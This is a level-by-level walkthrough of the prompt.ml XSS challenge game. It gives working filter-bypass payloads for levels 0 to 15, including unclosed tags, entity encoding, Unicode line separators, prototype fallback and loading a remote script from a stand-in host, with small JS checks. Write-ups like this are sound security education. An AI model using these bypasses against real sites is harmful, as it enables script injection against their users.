prompt(1) to win: walkthrough notes

Site: http://prompt.ml
An XSS challenge game in the style of alert(1); each level is cleared by getting prompt(1) to execute.

level 0

function escape(input) {
    // warm up
    // script should be executed without user interaction
    return '<input type="text" value="' + input + '">';
}

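This is XSS inside the value attribute of an input tag with no filtering at all, so closing the double quote and the tag and then inserting an ordinary payload is enough:

a"><img src=x onerror=prompt(1)>//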

level 1

function escape(input) {
    // tags stripping mechanism from ExtJS library
    // Ext.util.Format.stripTags
    var stripTagsRE = /<\/?[^>]+>/gi;
    input = input.replace(stripTagsRE, '');

    return '<article>' + input + '</article>';
}

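The input goes through a regex filter: anything that starts with <, contains at least one character, and ends with > (including </>) is replaced with an empty string.
All of the following are stripped: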

<h1>
<script>
<sss>
</>

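Testing shows that a tag is stripped only when it is terminated by >. The input is wrapped in <article>, so a tag has to be injected for anything to execute.

<script> is therefore out, since it needs a closing tag; only a single tag without a closing > of its own can be used.

I first took this for some kind of JS auto-completion, but it is really the browser's tolerance of broken markup: leave the tag unclosed and the > of the trailing </article> closes it. A single-line comment then comments out the </article text that would otherwise end up inside the unquoted onerror value.
(In testing, the <!-- form also worked; anything that neutralizes the trailing text is enough.)

# onload fires once the page or image has finished loading; with src=x the load fails, so onerror is the handler that actually fires
# (use prompt(1) instead of alert(1) to clear the level)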
<img src=x onload=alert(1)//
<img src=x onerror=alert(1)//
<img src=x onerror=alert(1)<!--
<img src=x onerror="alert(1)"
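The effect of the filter can be checked outside the browser. The following is a minimal sketch that reuses the level's regex; the helper name stripTags and the variable names are illustrative, not part of the game.

```javascript
// Same regex as the level's escape(); the helper name is illustrative.
function stripTags(input) {
  return input.replace(/<\/?[^>]+>/gi, '');
}

// A tag that is closed with > is removed completely.
const closedTag = stripTags('<img src=x onerror=prompt(1)>');

// A tag that is left open has no > for the regex to anchor on, so it survives.
const openTag = stripTags('<img src=x onerror=prompt(1)//');
const rendered1 = '<article>' + openTag + '</article>';

console.log(JSON.stringify(closedTag));
console.log(rendered1);
```

In the rendered string the > of </article> is what finally closes the img tag, and the // keeps the leftover </article text from breaking the handler.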

level 2

function escape(input) {
    //                      v-- frowny face
    input = input.replace(/[=(]/g, '');

    // ok seriously, disallows equal signs and open parenthesis
    return input;
}

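This level comes down to the order in which the browser decodes things:
https://segmentfault.com/q/1010000002393260

My understanding first:
1. For ordinary requests the browser only does URL encoding; URL decoding happens on the server. The browser is always the sender of a URL and the server the receiver, so only the server needs to interpret it.
PS: the one exception is a javascript:alert(1) style URL. When it is clicked, the browser acts as its own local server and URL-decodes the content in order to interpret it.
2. The browser performs HTML decoding first and JS parsing afterwards.

Back to the level: the regex runs on the raw input string before it is written into the DOM, so an HTML-encoded ( (written as &#40;) passes the check. When the browser builds the DOM tree it parses the HTML first, decoding <svg> and the entity, and only then parses the JS, so the call executes. The <svg> wrapper matters: the content of a plain HTML <script> is raw text in which entities are not decoded, whereas inside <svg> the script content is parsed like ordinary markup.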
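Trace:
Set a breakpoint.

Run; on reaching the escape function, the HTML-encoded ( has not been decoded:

The code is written into the sandbox (the prompt(1) game renders its result in a sandbox, so the payload is written into the sandbox once):

The input is written into the DOM, where the real parsing happens (see the browser parsing flow):

The browser then parses the svg tag as XML.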

The filter removes = and (, which breaks ordinary payloads, so the payload is:

HTML encoding gets past the regex:
<svg><script>prompt&#40;1)</script>
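To see why the entity form is needed, here is a small sketch that runs the level's filter over both variants. The function name level2 is illustrative; only the string filtering is reproduced, not the browser's entity decoding.

```javascript
// Same filter as the level's escape(); the name is illustrative.
function level2(input) {
  return input.replace(/[=(]/g, '');
}

// The literal parenthesis is removed, leaving broken JS.
const plain2 = level2('<svg><script>prompt(1)</script>');

// The entity contains neither = nor (, so it passes through untouched.
const encoded2 = level2('<svg><script>prompt&#40;1)</script>');

console.log(plain2);
console.log(encoded2);
```

The filter only ever sees the characters &, #, 4, 0 and ;, and the ( appears later, when the HTML parser decodes the entity.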

level 3

function escape(input) {
    // filter potential comment end delimiters
    input = input.replace(/->/g, '_');

    // comment the input to avoid script execution
    return '<!-- ' + input + ' -->';
}

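The filter only replaces ->, and HTML parsers also accept --!> as the end of a comment, so closing the comment with --!> is enough:

--!><script>prompt(1)</script>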
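A quick check of the filter, as a sketch with an illustrative function name (level3), shows that the normal comment terminator is mangled while --!> passes through:

```javascript
// Same logic as the level's escape(); the name is illustrative.
function level3(input) {
  input = input.replace(/->/g, '_');
  return '<!-- ' + input + ' -->';
}

const normalEnd = level3('--><script>prompt(1)</script>');
const bangEnd = level3('--!><script>prompt(1)</script>');

console.log(normalEnd);
console.log(bangEnd);
```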

level 4

function escape(input) {
    // make sure the script belongs to own site
    // sample script: http://prompt.ml/js/test.js
    if (/^(?:https?:)?\/\/prompt\.ml\//i.test(decodeURIComponent(input))) {
        var script = document.createElement('script');
        script.src = input;
        return script.outerHTML;
    } else {
        return 'Invalid resource.';
    }
}

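Judging from the filter, the goal is to get past the regex and load an external JS file.

Use the @ sign so that the browser takes the host after it as the origin of the script: decodeURIComponent turns %2f into /, so the regex sees //prompt.ml/, while the browser treats prompt.ml%2f as the userinfo part of the URL. (This failed in Chrome, which reported blocked:origin when loading the script; it worked in Firefox.)
Start a local web server and create xss.js in its root directory with the following code:

prompt(1)
alert(1)

Payload (the host and path after @ decide where the script is actually loaded from):

http://prompt.ml%2f@prompt.ml/js/test.js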
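The mismatch between what the regex sees and what a URL parser sees can be sketched as follows. The host attacker.example and the path /xss.js are assumptions made for illustration; they stand in for whatever server hosts the script.

```javascript
// Same regex as the level's escape().
const filter4 = /^(?:https?:)?\/\/prompt\.ml\//i;

// Hypothetical payload: attacker.example and /xss.js are placeholders.
const payload4 = 'http://prompt.ml%2f@attacker.example/xss.js';

// The filter tests the decoded string, where %2f has become a slash.
const decoded4 = decodeURIComponent(payload4);
const passes4 = filter4.test(decoded4);

// The URL parser works on the raw string, where everything before @ is userinfo.
const parsed4 = new URL(payload4);

console.log(decoded4);
console.log(passes4, parsed4.hostname, parsed4.pathname);
```

The check runs on the decoded copy but script.src receives the undecoded input, which is the gap the payload exploits.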

level 5

function escape(input) {
    // apply strict filter rules of level 0
    // filter ">" and event handlers
    input = input.replace(/>|on.+?=|focus/gi, '_');

    return '<input value="' + input + '" type="text">';
}

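The filter replaces >, on...= event handlers (onclick= and the like), and focus.
The injection point is an input tag, though, so the type attribute can be changed to turn it into an image (the first type attribute wins, so the trailing type="text" is ignored). A line break before = then defeats the on.+?= match, because . does not match a newline:

" type="image" src=x onerror
="prompt(1)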
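The difference a line break makes can be checked with a short sketch that reuses the level's filter; the function name level5 is illustrative.

```javascript
// Same logic as the level's escape(); the name is illustrative.
function level5(input) {
  input = input.replace(/>|on.+?=|focus/gi, '_');
  return '<input value="' + input + '" type="text">';
}

// With a space before =, "onerror =" still matches on.+?= and is replaced.
const sameLine5 = level5('" type="image" src=x onerror ="prompt(1)');

// With a newline before =, the dot cannot cross the line break and nothing matches.
const splitLine5 = level5('" type="image" src=x onerror\n="prompt(1)');

console.log(sameLine5);
console.log(splitLine5);
```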

level 6

function escape(input) {
    // let's do a post redirection
    try {
        // pass in formURL#formDataJSON
        // e.g. http://httpbin.org/post#{"name":"Matt"}
        var segments = input.split('#');
        var formURL = segments[0];
        var formData = JSON.parse(segments[1]);

        var form = document.createElement('form');
        form.action = formURL;
        form.method = 'post';

        for (var i in formData) {
            var input = form.appendChild(document.createElement('input'));
            input.name = i;
            input.setAttribute('value', formData[i]);
        }

        return form.outerHTML + '                         \n\
<script>                                                  \n\
    // forbid javascript: or vbscript: and data: stuff    \n\
    if (!/script:|data:/i.test(document.forms[0].action)) \n\
        document.forms[0].submit();                       \n\
    else                                                  \n\
        document.write("Action forbidden.")               \n\
</script>                                                 \n\
        ';
    } catch (e) {
        return 'Invalid form data.';
    }
}

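The input has the form url#json and is submitted as a POST form; the action is checked against pseudo-protocols such as javascript: and data:.
So I tried javascript:alert(1),
which was rejected. I later learned that a form control named action shadows the form's own action property: document.forms[0].action then returns the input element instead of the URL string, so the regex test passes. That gives the following payloads:

javascript:alert(1)#{"action":"123"}
javascript:prompt(1)#{"action":"123"}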
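Outside a browser the shadowing itself cannot be reproduced, but the reason the check then passes can be sketched. The object below is only a stand-in for the input element; the assumption is that the element converts to the string "[object HTMLInputElement]", as elements do in browsers.

```javascript
// Same regex as the inline script in the level.
const check6 = /script:|data:/i;

// Stand-in (assumption) for the <input name="action"> element that
// document.forms[0].action returns once such a control exists in the form.
const shadowedAction = {
  toString() { return '[object HTMLInputElement]'; }
};

// The real action string would be blocked...
const blocksString = check6.test('javascript:prompt(1)');

// ...but test() converts its argument to a string, and the element's string
// form contains neither "script:" nor "data:".
const blocksElement = check6.test(shadowedAction);

console.log(blocksString, blocksElement);
```

The form is therefore submitted, and the submission still uses the real action attribute, which holds the javascript: URL.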

level 7

function escape(input) {
    // pass in something like dog#cat#bird#mouse...
    var segments = input.split('#');
    return segments.map(function(title) {
        // title can only contain 12 characters
        return '<p class="comment" title="' + title.slice(0, 12) + '"></p>';
    }).join('\n');
}

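The code limits each segment to 12 characters, so the markup generated between segments has to be commented out; testing shows that /**/ is the form that works.

JS has two kinds of comments:

// single-line comment
/**/ multi-line comment
HTML comments are <!-- -->
Do not mix them up.

payload:

"><script>/*#*/prompt(/*#*/1)/*#*/</script>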
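As a sanity check, the sketch below runs the payload through the level's logic, confirms that no segment exceeds 12 characters, and strips the block comments from the resulting script body to show what is left. The function and variable names are illustrative.

```javascript
// Same logic as the level's escape(); the name is illustrative.
function level7(input) {
  return input.split('#').map(function (title) {
    return '<p class="comment" title="' + title.slice(0, 12) + '"></p>';
  }).join('\n');
}

const payload7 = '"><script>/*#*/prompt(/*#*/1)/*#*/</script>';
const longest7 = Math.max(...payload7.split('#').map((s) => s.length));

const html7 = level7(payload7);

// Text between <script> and </script>, then with /* ... */ comments removed.
const start7 = html7.indexOf('<script>') + '<script>'.length;
const body7 = html7.slice(start7, html7.indexOf('</script>'));
const code7 = body7.replace(/\/\*[\s\S]*?\*\//g, '');

console.log(longest7);
console.log(code7);
```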

level 8 (I have not fully understood this one either)

function escape(input) {
    // prevent input from getting out of comment
    // strip off line-breaks and stuff
    input = input.replace(/[\r\n</"]/g, '');

    return '                                \n\
<script>                                    \n\
    // console.log("' + input + '");        \n\
</script> ';
}

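The idea is to get past the regex with an encoding trick and then rely on browser behavior:
Use Unicode. U+2028 (line separator) is not in the filtered character class, but JS treats it as a line terminator, so it ends the // comment; the trailing --> at the start of the next line is treated as a single-line comment and hides the leftover "); text. Works in Chrome, not in Firefox.

// enter the following in the browser console to obtain the payload
'\u2028alert(1)\u2028-->'

In Chrome:

alert(1) -->

In IE: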
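Both halves of the trick can be checked in plain JS. This is a sketch with illustrative names: it shows that the filter leaves U+2028 alone, and that U+2028 really ends a // comment (demonstrated with new Function rather than with the level's script tag).

```javascript
// Same character class as the level's escape().
const filter8 = /[\r\n</"]/g;

const payload8 = '\u2028prompt(1)\u2028-->';
const filtered8 = payload8.replace(filter8, '');

// U+2028 is a JS line terminator, so the return statement below is not
// part of the comment and actually runs.
const afterComment = new Function('// comment\u2028return 42;')();

console.log(filtered8 === payload8);
console.log(afterComment);
```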

level 9

function escape(input) {
    // filter potential start-tags
    input = input.replace(/<([a-zA-Z])/g, '<_$1');
    // use all-caps for heading
    input = input.toUpperCase();

    // sample input: you shall not pass! => YOU SHALL NOT PASS!
    return '<h1>' + input + '</h1>';
}

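Another curious level, again an encoding bypass. This time a Latin letter gets past the regex:
https://unicode-table.com/cn/017F/
ſ (U+017F, Latin small letter long s) is not matched by [a-zA-Z], but toUpperCase() turns it into a plain S, so the tag is parsed.

payload:

<ſcript ſrc=http://localhost/xss.js></ſcript>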
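The sketch below, with an illustrative function name, compares an ASCII tag with the long-s variant. Note that the whole URL is upper-cased as well, so the server has to answer for the upper-case path.

```javascript
// Same logic as the level's escape(); the name is illustrative.
function level9(input) {
  input = input.replace(/<([a-zA-Z])/g, '<_$1');
  input = input.toUpperCase();
  return '<h1>' + input + '</h1>';
}

// The ASCII tag is defused by the inserted underscore.
const ascii9 = level9('<script src=http://localhost/xss.js></script>');

// The long s slips past the regex and only becomes S afterwards.
const longS9 = level9('<ſcript ſrc=http://localhost/xss.js></ſcript>');

console.log(ascii9);
console.log(longS9);
```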

level 10

function escape(input) {
    // (╯°□°）╯︵ ┻━┻
    input = encodeURIComponent(input).replace(/prompt/g, 'alert');
    // ┬──┬ ノ( ゜-゜ノ) chill out bro
    input = input.replace(/'/g, '');

    // (╯°□°）╯︵ /(.□. \）DONT FLIP ME BRO
    return '<script>' + input + '</script> ';
}

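prompt is replaced with alert first and single quotes are removed afterwards, so a quote placed inside the word hides it from the replacement and is then stripped.
Payload:
prom'pt(1)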
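The order of the two replacements is what makes this work, as the following sketch shows (the function name level10 is illustrative):

```javascript
// Same logic as the level's escape(); the name is illustrative.
function level10(input) {
  input = encodeURIComponent(input).replace(/prompt/g, 'alert');
  input = input.replace(/'/g, '');
  return '<script>' + input + '</script> ';
}

const direct10 = level10('prompt(1)');
const quoted10 = level10("prom'pt(1)");

console.log(direct10);
console.log(quoted10);
```

encodeURIComponent leaves ', ( and ) unencoded, which is why the payload reaches the two replacements unchanged.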

level 11

function escape(input) {
    // name should not contain special characters
    var memberName = input.replace(/[[|\s+*/\\<>&^:;=~!%-]/g, '');

    // data to be parsed as JSON
    var dataString = '{"action":"login","message":"Welcome back, ' + memberName + '."}';

    // directly "parse" data in script context
    return '                                \n\
<script>                                    \n\
    var data = ' + dataString + ';          \n\
    if (data.action === "login")            \n\
        document.write(data.message)        \n\
</script> ';
}

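A JS feature: in an object literal, a later property overrides an earlier one with the same name.

When two names are the same, the later one is always the one that is output, so the goal would be to construct "message":prompt(1).
But the existing quote has to be closed first, and the regex filters nearly every symbol, so another approach is needed.
The trick is to use operators that are spelled with letters, such as in and instanceof, to get around the restriction. Both work here; the payload is "(prompt(1))instanceof" or "(prompt(1))in". The string in front of the payload is then "called" with prompt(1) as its argument, and the argument is evaluated before the call fails with a TypeError, which is all that is needed.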
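The evaluation order can be observed without a browser. In this sketch the level's filter builds the data string, and the resulting statement is run through new Function with a recording stub in place of the real prompt; the stub and all names are assumptions made for the demonstration.

```javascript
// Same filter and template as the level's escape(); the name is illustrative.
function level11Data(input) {
  var memberName = input.replace(/[[|\s+*/\\<>&^:;=~!%-]/g, '');
  return '{"action":"login","message":"Welcome back, ' + memberName + '."}';
}

const data11 = level11Data('"(prompt(1))in"');

const calls11 = [];
let error11 = null;
try {
  // Recording stub instead of the browser's prompt (assumption for this sketch).
  new Function('prompt', 'var data = ' + data11 + ';')(function (value) {
    calls11.push(value);
  });
} catch (e) {
  error11 = e;
}

console.log(data11);
console.log(calls11, error11 && error11.name);
```

The statement still throws, but only after the argument list, and with it prompt(1), has been evaluated.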

level 12

function escape(input) {
    // in Soviet Russia...
    input = encodeURIComponent(input).replace(/'/g, '');
    // table flips you!
    input = input.replace(/prompt/g, 'alert');

    // ノ┬─┬ノ ︵ ( \o°o)\
    return '<script>' + input + '</script> ';
}

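Very similar to level 10, but the order is swapped: quotes are stripped before prompt is replaced, so the previous trick no longer works. The name can instead be built at run time and passed to eval, since 630038579 written in base 30 is prompt:
eval((630038579).toString(30))(1)
Because single quotes are filtered, my attempt to decode base64 with atob did not succeed.
There are many other approaches; see
https://blog.csdn.net/Ni9htMar3/article/details/77938899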
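The number can be verified, and the payload checked against the filter, with a short sketch (names are illustrative):

```javascript
// Same logic as the level's escape(); the name is illustrative.
function level12(input) {
  input = encodeURIComponent(input).replace(/'/g, '');
  input = input.replace(/prompt/g, 'alert');
  return '<script>' + input + '</script> ';
}

// Base 30 is the smallest radix that has a digit for "t".
const word12 = (630038579).toString(30);
const number12 = parseInt('prompt', 30);

// The level 10 trick no longer works: the quote is gone before the replacement.
const quoted12 = level12("prom'pt(1)");

// The numeric form contains only characters encodeURIComponent leaves alone.
const numeric12 = level12('eval((630038579).toString(30))(1)');

console.log(word12, number12);
console.log(quoted12);
console.log(numeric12);
```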

level 13

 function escape(input) {
    // extend method from Underscore library
    // _.extend(destination, *sources) 
    function extend(obj) {
        var source, prop;
        for (var i = 1, length = arguments.length; i < length; i++) {
            source = arguments[i];
            for (prop in source) {
                obj[prop] = source[prop];
            }
        }
        return obj;
    }
    // a simple picture plugin
    try {
        // pass in something like {"source":"http://sandbox.prompt.ml/PROMPT.JPG"}
        var data = JSON.parse(input);
        var config = extend({
            // default image source
            source: 'http://placehold.it/350x150'
        }, JSON.parse(input));
        // forbit invalid image source
        if (/[^\w:\/.]/.test(config.source)) {
            delete config.source;
        }
        // purify the source by stripping off "
        var source = config.source.replace(/"/g, '');
        // insert the content using mustache-ish template
        return '<img src="{{source}}">'.replace('{{source}}', source);
    } catch (e) {
        return 'Invalid image data.';
    }
}

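After a rough read of the code, the logic seems to be as follows (I peeked at the answer):
The input is parsed with JSON.parse, which throws if it is not JSON. extend() then overwrites the default properties with the ones from the input, and a regex checks whether the value of source contains characters that do not belong in a URL; if it does, the source property is deleted.
Every object carries an internal link to its prototype, exposed as __proto__. When a property is read and the object has no own property of that name, the lookup continues in __proto__.

So the basic construction is {"source":"'","__proto__":{"source":"onerror=prompt(1)"}}. The own source contains the illegal character ' and is deleted, after which config.source resolves to the one on __proto__. Because " is stripped before the substitution, the src attribute cannot be closed directly, but String.prototype.replace happens to support special replacement patterns: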

Pattern	Inserts
$$	Inserts a literal $.
$'	Inserts the portion of the string that follows the matched substring.
$`	Inserts the portion of the string that precedes the matched substring.
$&	Inserts the matched substring.
$n	Where n is a positive integer less than 100, inserts the nth parenthesized submatch string, provided the first argument was a RegExp object. Note that this is 1-indexed.

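The figure below shows the details:

So the payload is as follows; $` expands to the text before the match, <img src=", which supplies the quote that closes src:

{"source":"'","__proto__":{"source":"$`onerror=prompt(1)>"}}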
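The whole chain (prototype fallback, then the $` expansion) can be followed in a sketch that condenses the level's code. The variable names are illustrative, and the behavior shown assumes an engine where assigning to obj["__proto__"] sets the prototype, as it does in browsers and in Node by default.

```javascript
// Condensed version of the level's extend(); behavior is the same.
function extend13(obj) {
  for (var i = 1; i < arguments.length; i++) {
    var source = arguments[i];
    for (var prop in source) {
      obj[prop] = source[prop]; // prop === "__proto__" sets obj's prototype
    }
  }
  return obj;
}

const input13 = '{"source":"\'","__proto__":{"source":"$`onerror=prompt(1)>"}}';
const config13 = extend13({ source: 'http://placehold.it/350x150' }, JSON.parse(input13));

// The own source is "'" and fails the check, so it is deleted...
if (/[^\w:\/.]/.test(config13.source)) {
  delete config13.source;
}
// ...and the lookup now falls through to the prototype's source.
const source13 = config13.source.replace(/"/g, '');

// $` inserts the text before the match, i.e. <img src="
const html13 = '<img src="{{source}}">'.replace('{{source}}', source13);

console.log(source13);
console.log(html13);
```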

level 14 (my answer is wrong; still thinking)

function escape(input) {
    // I expect this one will have other solutions, so be creative :)
    // mspaint makes all file names in all-caps :(
    // too lazy to convert them back in lower case
    // sample input: prompt.jpg => PROMPT.JPG
    input = input.toUpperCase();
    // only allows images loaded from own host or data URI scheme
    input = input.replace(/\/\/|\w+:/g, 'data:');
    // miscellaneous filtering
    input = input.replace(/[\\&+%\s]|vbs/gi, '_');

    return '<img src="' + input + '">';
}

level 15

function escape(input) {
    // sort of spoiler of level 7
    input = input.replace(/\*/g, '');
    // pass in something like dog#cat#bird#mouse...
    var segments = input.split('#');

    return segments.map(function(title, index) {
        // title can only contain 15 characters
        return '<p class="comment" title="' + title.slice(0, 15) + '" data-comment=\'{"id":' + index + '}\'></p>';
    }).join('\n');
}

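Same idea as level 7, except that * is now filtered, so HTML comments are used instead. Inside <svg> the script content is parsed as markup, so <!-- --> is recognized there. Payload:

"><svg><!--#--><script><!--#-->prompt(1<!--#-->)</script>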
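As with level 7, a sketch can confirm that every segment fits the 15-character limit and show what remains of the script body once the HTML comments are removed. Names are illustrative, and the comment stripping is done with a regex here rather than by a real HTML parser.

```javascript
// Same logic as the level's escape(); the name is illustrative.
function level15(input) {
  input = input.replace(/\*/g, '');
  return input.split('#').map(function (title, index) {
    return '<p class="comment" title="' + title.slice(0, 15) +
      '" data-comment=\'{"id":' + index + '}\'></p>';
  }).join('\n');
}

const payload15 = '"><svg><!--#--><script><!--#-->prompt(1<!--#-->)</script>';
const lengths15 = payload15.split('#').map((s) => s.length);

const html15 = level15(payload15);

// Text between <script> and </script>, then with <!-- ... --> comments removed.
const start15 = html15.indexOf('<script>') + '<script>'.length;
const body15 = html15.slice(start15, html15.indexOf('</script>'));
const code15 = body15.replace(/<!--[\s\S]*?-->/g, '');

console.log(lengths15);
console.log(code15);
```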